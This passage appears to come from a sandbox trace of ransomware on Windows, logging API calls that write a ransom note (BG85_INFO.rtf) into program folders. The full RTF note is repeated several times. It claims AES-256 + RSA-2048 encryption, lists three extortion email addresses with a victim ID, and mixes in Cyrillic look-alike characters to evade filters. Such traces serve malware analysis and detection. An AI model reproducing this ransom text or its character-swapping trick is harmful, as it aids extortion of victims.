\\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2867358, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 7247 [0064.908] WriteFile (in: hFile=0x1e4, lpBuffer=0x2867358*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2867358*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0064.928] CloseHandle (hObject=0x1e4) returned 1 [0064.928] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHS\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\chs\\bg85_info.rtf")) returned 0xffffffff [0064.928] GetLastError () returned 0x2 [0064.928] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHS\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\chs\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0065.129] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0065.129] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 